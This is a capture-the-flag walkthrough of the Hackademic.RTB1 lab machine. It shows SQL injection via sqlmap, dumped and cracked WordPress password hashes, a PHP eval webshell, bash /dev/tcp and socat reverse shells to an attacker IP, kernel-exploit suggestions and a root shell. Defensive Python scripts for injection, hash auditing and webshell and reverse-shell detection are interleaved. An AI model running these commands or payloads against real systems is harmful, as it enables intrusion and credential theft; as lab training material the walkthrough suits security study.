Disclaimer: the articles I write are for learning and research only. Do not use the techniques or source code in them for illegal purposes; any negative consequences or legal violations caused by anyone are unrelated to me.
nmap -sC -sV -p- -oA hackademis 10.7.3.4
nmap -p- 10.7.3.4
- Try browsing directly to http://10.7.3.4
- Click through a few pages and append ' and 1=1 / ' and 1=2 to check for injection; a SQL injection vulnerability was confirmed
- http://10.7.3.4/Hackademic_RTB1/?cat=1
- Run sqlmap against it directly
- sqlmap -u "http://10.7.3.4/Hackademic_RTB1/?cat=1"
- While sqlmap was running, the --union-char option came up
- The reason:
By default sqlmap fills the columns of a UNION-based injection with NULL, but on some targets that makes the page fail to render while a random integer succeeds; --union-char lets you specify the value sqlmap uses in the UNION query instead.
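The boolean test used above only works because the application splices the cat parameter straight into its SQL text. The following Python script is an added illustration, not code from this walkthrough or from WordPress: it builds a constructed in-memory SQLite table standing in for the post lookup behind ?cat=1, shows the string-built query beside a parameterized one, and runs the same and 1=1 / and 1=2 differential against both. Table, column and function names are assumptions.

```python
import sqlite3

# Constructed rows standing in for the category/post lookup behind ?cat=<id>
# (table and column names are assumptions, not the real WordPress schema).
SAMPLE_POSTS = [
    (1, 1, "Welcome"),
    (2, 1, "Second post"),
    (3, 2, "Other category"),
]


def make_db():
    """Create an in-memory database holding the constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE posts (id INTEGER, cat_id INTEGER, title TEXT)")
    con.executemany("INSERT INTO posts VALUES (?, ?, ?)", SAMPLE_POSTS)
    return con


def posts_by_cat_vulnerable(con, cat):
    """Vulnerable pattern: the request parameter is concatenated into the SQL text."""
    sql = "SELECT title FROM posts WHERE cat_id = " + cat
    return [row[0] for row in con.execute(sql)]


def posts_by_cat_safe(con, cat):
    """Hardened pattern: validate the type, then bind the value as a parameter."""
    try:
        cat_id = int(cat)
    except (TypeError, ValueError):
        return []  # anything that is not a plain integer is rejected outright
    sql = "SELECT title FROM posts WHERE cat_id = ?"
    return [row[0] for row in con.execute(sql, (cat_id,))]


def boolean_differential(query_fn, con, cat_id):
    """Apply the tautology/contradiction test from the walkthrough to a query function.

    A different result for 'and 1=1' versus 'and 1=2' means the database
    evaluated the appended expression, i.e. the parameter is injectable.
    """
    true_case = query_fn(con, f"{cat_id} and 1=1")
    false_case = query_fn(con, f"{cat_id} and 1=2")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("string-built query injectable:", boolean_differential(posts_by_cat_vulnerable, db, 1))
    print("parameterized query injectable:", boolean_differential(posts_by_cat_safe, db, 1))
```

The parameterized version never sees "1 and 1=1" as SQL: int() rejects it before any query runs, so both probes return the same empty result and the differential disappears. The same fix applies to the real WordPress handler, which in this old version builds the query from the raw cat value.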
- sqlmap's output was as follows:
available databases [3]:
[*] information_schema
[*] mysql
[*] wordpress
Database: wordpress
[9 tables]
+-------------------+
| wp_categories |
| wp_comments |
| wp_linkcategories |
| wp_links |
| wp_options |
| wp_post2cat |
| wp_postmeta |
| wp_posts |
| wp_users |
+-------------------+
[22 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_aim | varchar(50) |
| user_browser | varchar(200) |
| user_description | longtext |
| user_domain | varchar(200) |
| user_email | varchar(100) |
| user_firstname | varchar(50) |
| user_icq | int(10) unsigned |
| user_idmode | varchar(20) |
| user_ip | varchar(15) |
| user_lastname | varchar(50) |
| user_level | int(2) unsigned |
| user_login | varchar(60) |
| user_msn | varchar(100) |
| user_nicename | varchar(50) |
| user_nickname | varchar(50) |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
| user_yim | varchar(50) |
+---------------------+---------------------+
[6 entries]
+-------------------------+
| user_email |
+-------------------------+
| GeorgeMiller@hacked.com |
| JasonKonnors@hacked.com |
| JohnSmith@hacked |
| MaxBucky@hacked.com |
| NickJames@hacked.com |
| TonyBlack@hacked.com |
+-------------------------+
[6 entries]
+--------------+---------------------------------------------+
| user_login | user_pass |
+--------------+---------------------------------------------+
| NickJames | 21232f297a57a5a743894a0e4a801fc3 (admin) |
| MaxBucky | 50484c19f1afdaf3841a0d821ed393d2 (kernel) |
| GeorgeMiller | 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3) |
| JasonKonnors | 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell) |
| TonyBlack | a6e514f9486b83cb53d8d932f9a04292 (napoleon) |
| JohnSmith | b986448f0bb9e5e124ca91d3d650f52c |
+--------------+---------------------------------------------+
* NickJames: fairly high privileges
* MaxBucky: basically no privileges
* GeorgeMiller: very high privileges
* JasonKonnors: basically no privileges
* TonyBlack: basically no privileges
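The user_pass column above holds 32-character hex values that sqlmap annotates with the plaintext it recovered, which is exactly what unsalted MD5 storage looks like. The script below is an added audit example and not part of the writeup: it parses a constructed excerpt in the shape of the sqlmap dump (the logins are invented; the phpass and bcrypt rows are placeholders), classifies each stored hash by format, and lists the accounts whose passwords are stored as bare MD5. It goes a little beyond the page by also recognizing the $P$ phpass format that WordPress adopted in 2.5 and the $2y$ bcrypt format.

```python
import re

# Constructed excerpt shaped like sqlmap's dump of wp_users. The logins are invented;
# the first hash is the well-known unsalted MD5 of "admin" that also appears in the
# real dump, the phpass and bcrypt rows are placeholders to show the other formats.
SAMPLE_DUMP = """\
+--------------+--------------------------------------------+
| user_login   | user_pass                                  |
+--------------+--------------------------------------------+
| alice        | 21232f297a57a5a743894a0e4a801fc3 (admin)   |
| bob          | b986448f0bb9e5e124ca91d3d650f52c           |
| carol        | $P$BCONSTRUCTEDphpassPLACEHOLDER.......    |
| dave         | $2y$10$CONSTRUCTEDbcryptPLACEHOLDER....... |
+--------------+--------------------------------------------+
"""

# One data row: "| login | hash [ (cracked) ] |"; the parenthesised guess is dropped.
ROW_RE = re.compile(r"^\|\s*(\S+)\s*\|\s*(\S+)(?:\s*\([^)]*\))?\s*\|$")


def classify_hash(stored):
    """Name the storage format of one password hash string."""
    if re.fullmatch(r"[0-9a-f]{32}", stored):
        return "unsalted-md5"      # legacy WordPress (before 2.5), as in the dump above
    if stored.startswith(("$P$", "$H$")):
        return "phpass"            # salted, iterated MD5 (WordPress 2.5 onward)
    if stored.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"
    return "unknown"


def parse_dump(text):
    """Return (login, hash) pairs from the ASCII table, skipping borders and header."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m and m.group(1) != "user_login":
            rows.append((m.group(1), m.group(2)))
    return rows


def audit(text):
    """Map each login to its hash storage format."""
    return {login: classify_hash(h) for login, h in parse_dump(text)}


def weak_accounts(text):
    """Logins whose password is stored as bare MD5 and should be forced to reset."""
    return sorted(login for login, kind in audit(text).items() if kind == "unsalted-md5")


if __name__ == "__main__":
    for login, kind in audit(SAMPLE_DUMP).items():
        print(f"{login:12} {kind}")
    print("force reset:", weak_accounts(SAMPLE_DUMP))
```

Unsalted MD5 is why sqlmap could label five of the six real hashes with their plaintext straight from a lookup: identical passwords give identical hashes, and no per-user work factor slows a guess down. Any account the audit reports as unsalted-md5 should be re-hashed on next login and the whole table migrated off the legacy format.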
- Next, try brute-forcing the directory tree
- python3 dirsearch.py -u http://10.7.3.4/Hackademic_RTB1/ -w /usr/share/dirb/wordlists/big.txt -e php
dirsearch v0.3.8
Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 20469
Error Log: /usr/local/dirsearch/logs/errors-19-11-25_17-41-40.log
Target: http://10.7.3.4/Hackademic_RTB1/
[17:41:40] Starting:
[17:51:31] 301 - 329B - /Hackademic_RTB1/wp-admin -> http://10.7.3.4/Hackademic_RTB1/wp-admin/
[17:51:31] 301 - 331B - /Hackademic_RTB1/wp-content -> http://10.7.3.4/Hackademic_RTB1/wp-content/
[17:51:31] 301 - 330B - /Hackademic_RTB1/wp-images -> http://10.7.3.4/Hackademic_RTB1/wp-images/
[17:51:31] 301 - 332B - /Hackademic_RTB1/wp-includes -> http://10.7.3.4/Hackademic_RTB1/wp-includes/
Task Completed
By editing the file textile1.php inside it directly, its code can be replaced with the one-line webshell below;
then connect to it with AntSword (中国蚁剑); there are of course other ways to get a reverse shell as well.
<?php eval($_POST['tdhkone']); ?>
http://10.7.3.4/Hackademic_RTB1/wp-content/plugins/textile1.php
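A planted one-liner like the one above is easy to catch with a file scan of the plugin and theme directories. The script below is an added example and is not part of the writeup or of WordPress: it builds a constructed plugin tree in a temporary directory (one benign file, one file carrying the eval($_POST[...]) line from above), then walks it looking for eval/assert/system calls fed straight from request superglobals. The pattern list, file names and function names are assumptions.

```python
import os
import re
import tempfile

# Patterns typical of one-line PHP webshells: a code-execution primitive fed
# straight from a request superglobal. This list is an assumption, not exhaustive.
SUSPICIOUS = {
    "eval-from-request": re.compile(
        r"\b(?:eval|assert)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
    "shell-from-request": re.compile(
        r"\b(?:system|shell_exec|passthru|exec|popen)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
    "preg_replace-e": re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]", re.I),
}


def scan_file(path):
    """Return [(line_number, rule_name)] for every suspicious line in one file."""
    hits = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, start=1):
            for name, pat in SUSPICIOUS.items():
                if pat.search(line):
                    hits.append((lineno, name))
    return hits


def scan_tree(root):
    """Walk a wp-content style tree; map each PHP file with hits to its hit list."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, fname)
            hits = scan_file(path)
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


def build_sample_tree():
    """Constructed plugin tree in a temp dir: one benign file, one with the planted line."""
    root = tempfile.mkdtemp(prefix="wp-content-")
    plugins = os.path.join(root, "plugins")
    os.makedirs(plugins)
    with open(os.path.join(plugins, "hello.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\nfunction hello_world() { return 'Hello'; }\n")
    with open(os.path.join(plugins, "textile1.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\n// plugin header would be here\n")
        fh.write("<?php eval($_POST['tdhkone']); ?>\n")  # the one-liner from the walkthrough
    return root


if __name__ == "__main__":
    sample = build_sample_tree()
    for rel, hits in scan_tree(sample).items():
        for lineno, rule in hits:
            print(f"{rel}:{lineno}: {rule}")
```

Two hardening steps close this path on a real site: define('DISALLOW_FILE_EDIT', true); in wp-config.php removes the dashboard plugin/theme editor that lets a logged-in admin rewrite a file such as textile1.php, and running the scan (or a file-integrity monitor comparing against the distributed plugin files) on a schedule flags a modification even when the editor stays enabled.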
This old system has no socat command, so a tty shell cannot be bounced with socat; the usual pair would be:
socat file:`tty`,raw,echo=0 tcp-listen:9988
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.7.3.5:9988
Use python2 to start a simple HTTP server, then download the privilege-escalation enumeration script and the local kernel exploit suggester script from it
python -m SimpleHTTPServer 8082
Use the following method to send a reverse shell back to the local Kali box.
Tried nc first, but this nc build is stripped down and lacks the -e / -c options.
/bin/bash -i > /dev/tcp/10.7.3.5/4488 0<&1 2>&1
Listen locally on Kali: nc -lvnp 4488
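The /dev/tcp redirection above is what makes a reverse shell possible without nc -e, and the same argv is what process auditing records. The script below is an added detection example and not part of the writeup: it runs a few constructed command lines (shaped like auditd EXECVE or ps output) through regexes for the bash /dev/tcp redirect, the nc -e/-c form, and the socat exec: form that appear on this page, and reports the remote endpoint where the command line exposes it. The sample lines, regexes and function names are assumptions.

```python
import re

# Constructed command lines, shaped like auditd EXECVE or ps output; the first
# three are the reverse-shell forms seen on this page, the rest are benign noise.
SAMPLE_CMDLINES = [
    "/bin/bash -i > /dev/tcp/10.7.3.5/4488 0<&1 2>&1",
    "nc -e /bin/sh 10.7.3.5 4444",
    "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.7.3.5:9988",
    "python -m SimpleHTTPServer 8082",
    "nc -lvnp 4488",
    "ls -la /var/www/html",
]

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
# bash's built-in /dev/tcp/<ip>/<port> pseudo-device used for the redirect above
DEV_TCP_RE = re.compile(r"/dev/(?:tcp|udp)/" + IPV4 + r"/(\d{1,5})")
# nc/ncat invoked with -e or -c (possibly bundled with other flags) plus ip and port
NC_EXEC_RE = re.compile(
    r"\b(?:nc|ncat|netcat)\b.*\s-[A-Za-z]*[ec]\b.*?\s" + IPV4 + r"\s+(\d{1,5})\b")
# socat with an exec: address connecting out to tcp:<ip>:<port>
SOCAT_RE = re.compile(r"\bsocat\b.*\bexec:.*\btcp4?:" + IPV4 + r":(\d{1,5})", re.I)


def classify_cmdline(cmd):
    """Return (verdict, 'ip:port') for one command line; remote is None when benign."""
    m = DEV_TCP_RE.search(cmd)
    if m:
        return ("bash-dev-tcp", f"{m.group(1)}:{m.group(2)}")
    m = NC_EXEC_RE.search(cmd)
    if m:
        return ("nc-exec", f"{m.group(1)}:{m.group(2)}")
    m = SOCAT_RE.search(cmd)
    if m:
        return ("socat-exec", f"{m.group(1)}:{m.group(2)}")
    return ("benign", None)


def triage(cmdlines):
    """Keep only the suspicious lines, paired with their verdict and remote endpoint."""
    alerts = []
    for cmd in cmdlines:
        verdict, remote = classify_cmdline(cmd)
        if verdict != "benign":
            alerts.append((verdict, remote, cmd))
    return alerts


if __name__ == "__main__":
    for verdict, remote, cmd in triage(SAMPLE_CMDLINES):
        print(f"[{verdict}] -> {remote}: {cmd}")
```

On the defending side, the extracted ip:port is the pivot: an outbound connection from the web server's user (here the process spawned by the webshell in textile1.php) to an address that is not one of its configured upstreams is the event to alert on, whichever of the three forms produced it.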
Then run ./linux-exploit-suggester.sh
Its output:
./linux-exploit-suggester.sh
Available information:
Kernel version: 2.6.31.5
Architecture: i386
Distribution: fedora
Distribution version: N/A
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
72 kernel space exploits
42 user space exploits
Possible Exploits:
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847.cpp
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2018-14665] raptor_xorgy
Details: https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
Exposure: less probable
Tags: centos=7.4
Download URL: https://www.exploit-db.com/download/45922
Comments: X.Org Server before 1.20.3 is vulnerable. Distros use own versioning scheme. Manual verification needed.
[+] [CVE-2018-10900] vpnc_privesc.py
Details: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
Exposure: less probable
Tags: ubuntu=16.04{network-manager-vpnc:1.1.93-1},debian=9.0{network-manager-vpnc:1.2.4-4},manjaro=17
Download URL: https://bugzilla.novell.com/attachment.cgi?id=779110
Comments: Distros use own versioning scheme. Manual verification needed.
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000370,CVE-2017-1000371] linux_offset2lib
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_offset2lib.c
Comments: Uses "Stack Clash" technique
[+] [CVE-2017-1000367] sudopwn
Details: https://www.sudo.ws/alerts/linux_tty.html
Exposure: less probable
Download URL: https://raw.githubusercontent.com/c0d3z3r0/sudo-CVE-2017-1000367/master/sudopwn.c
Comments: Needs to be sudoer. Works only on SELinux enabled systems
[+] [CVE-2017-1000367] Sudoer-to-root
Details: https://www.sudo.ws/alerts/linux_tty.html
Exposure: less probable
Tags: RHEL=7{sudo:1.8.6p7}
Download URL: https://www.qualys.com/2017/05/30/cve-2017-1000367/linux_sudo_cve-2017-1000367.c
Comments: Needs to be sudoer. Works only on SELinux enabled systems
[+] [CVE-2017-1000366,CVE-2017-1000371] linux_ldso_dynamic
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Tags: debian=9|10,ubuntu=14.04.5|16.04.2|17.04,fedora=23|24|25
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_dynamic.c
Comments: Uses "Stack Clash" technique, works against most SUID-root PIEs
[+] [CVE-2017-1000366,CVE-2017-1000370] linux_ldso_hwcap
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap.c
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2017-0358] ntfs-3g-modprobe
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
Exposure: less probable
Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
[+] [CVE-2016-6663,CVE-2016-6664|CVE-2016-6662] mysql-exploit-chain
Details: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
Exposure: less probable
Tags: ubuntu=16.04.1
Download URL: http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
Comments: Also MariaDB ver<10.1.18 and ver<10.0.28 affected
[+] [CVE-2016-4989] setroubleshoot 2
Details: https://c-skills.blogspot.com/2016/06/lets-feed-attacker-input-to-sh-c-to-see.html
Exposure: less probable
Tags: RHEL=6|7
Download URL: https://github.com/stealth/troubleshooter/raw/master/straight-shooter.c
[+] [CVE-2015-5287] abrt/sosreport-rhel7
Details: https://www.openwall.com/lists/oss-security/2015/12/01/1
Exposure: less probable
Tags: RHEL=7{abrt:2.1.11-12.el7}
Download URL: https://www.openwall.com/lists/oss-security/2015/12/01/1/1
[+] [CVE-2015-3315] raceabrt
Details: http://seclists.org/oss-sec/2015/q2/130
Exposure: less probable
Tags: fedora=19{abrt:2.1.5-1.fc19},fedora=20{abrt:2.2.2-2.fc20},fedora=21{abrt:2.3.0-3.fc21},RHEL=7{abrt:2.1.11-12.el7}
Download URL: https://gist.githubusercontent.com/taviso/fe359006836d6cd1091e/raw/32fe8481c434f8cad5bcf8529789231627e5074c/raceabrt.c
[+] [CVE-2015-3246] userhelper
Details: https://www.qualys.com/2015/07/23/cve-2015-3245-cve-2015-3246/cve-2015-3245-cve-2015-3246.txt
Exposure: less probable
Tags: RHEL=6{libuser:0.56.13-(4|5).el6},RHEL=6{libuser:0.60-5.el7},fedora=13|19|20|21|22
Download URL: https://www.exploit-db.com/download/37706
Comments: RHEL 5 is also vulnerable, but installed version of glibc (2.5) lacks functions needed by roothelper.c
[+] [CVE-2015-3202] fuse (fusermount)
Details: http://seclists.org/oss-sec/2015/q2/520
Exposure: less probable
Tags: debian=7.0|8.0,ubuntu=*
Download URL: https://www.exploit-db.com/download/37089
Comments: Needs cron or system admin interaction
[+] [CVE-2015-1862] newpid (abrt)
Details: http://openwall.com/lists/oss-security/2015/04/14/4
Exposure: less probable
Tags: fedora=20
Download URL: https://gist.githubusercontent.com/taviso/0f02c255c13c5c113406/raw/eafac78dce51329b03bea7167f1271718bee4dcc/newpid.c
[+] [CVE-2015-1815] setroubleshoot
Details: https://www.exploit-db.com/exploits/36564/
Exposure: less probable
Tags: fedora=21
Download URL: https://www.exploit-db.com/download/36564
[+] [CVE-2014-5119] __gconv_translit_find
Details: http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
Exposure: less probable
Tags: debian=6
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34421.tar.gz
[+] [CVE-2014-0196] rawmodePTY
Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
Exposure: less probable
Download URL: https://www.exploit-db.com/download/33516
[+] [CVE-2013-0268] msr
Details: https://www.exploit-db.com/exploits/27297/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/27297
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Details: http://vulnfactory.org/exploits/full-nelson.c
Exposure: less probable
Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},ubuntu=10.04{kernel:2.6.32-(21|24)-server}
Download URL: http://vulnfactory.org/exploits/full-nelson.c
[+] [CVE-2010-4347] american-sign-language
Details: https://www.exploit-db.com/exploits/15774/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/15774
[+] [CVE-2010-3904] rds
Details: http://www.securityfocus.com/archive/1/514379
Exposure: less probable
Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic}
Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
[+] [CVE-2010-3848,CVE-2010-3850,CVE-2010-4073] half_nelson
Details: https://www.exploit-db.com/exploits/17787/
Exposure: less probable
Tags: ubuntu=(10.04|9.10){kernel:2.6.(31|32)-(14|21)-server}
Download URL: https://www.exploit-db.com/download/17787
[+] [CVE-2010-3437] pktcdvd
Details: https://www.exploit-db.com/exploits/15150/
Exposure: less probable
Tags: ubuntu=10.04
Download URL: https://www.exploit-db.com/download/15150
[+] [CVE-2010-3301] ptrace_kmod2
Details: https://www.exploit-db.com/exploits/15023/
Exposure: less probable
Tags: debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},ubuntu=(10.04|10.10){kernel:2.6.(32|35)-(19|21|24)-server}
Download URL: https://www.exploit-db.com/download/15023
[+] [CVE-2010-3081] video4linux
Details: https://www.exploit-db.com/exploits/15024/
Exposure: less probable
Tags: RHEL=5
Download URL: https://www.exploit-db.com/download/15024
[+] [CVE-2010-2959] can_bcm
Details: https://www.exploit-db.com/exploits/14814/
Exposure: less probable
Tags: ubuntu=10.04{kernel:2.6.32-24-generic}
Download URL: https://www.exploit-db.com/download/14814
[+] [CVE-2010-1146] reiserfs
Details: https://www.exploit-db.com/exploits/12130/
Exposure: less probable
Tags: ubuntu=9.10
Download URL: https://www.exploit-db.com/download/12130
bash-4.0$ su - firefart
Password: redhat
[firefart@HackademicRTB1 ~]# ls
anaconda-ks.cfg Desktop key.txt key.txt~
[firefart@HackademicRTB1 ~]# id
uid=0(firefart) gid=0(root) groups=0(root)
[firefart@HackademicRTB1 ~]# ls
anaconda-ks.cfg Desktop key.txt key.txt~
[firefart@HackademicRTB1 ~]# cat key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)
$_d&jgQ>>ak\#b"(Hx"o<la_%
Regards,
mr.pr0n || p0wnbox.Team || 2011
http://p0wnbox.com
[firefart@HackademicRTB1 ~]#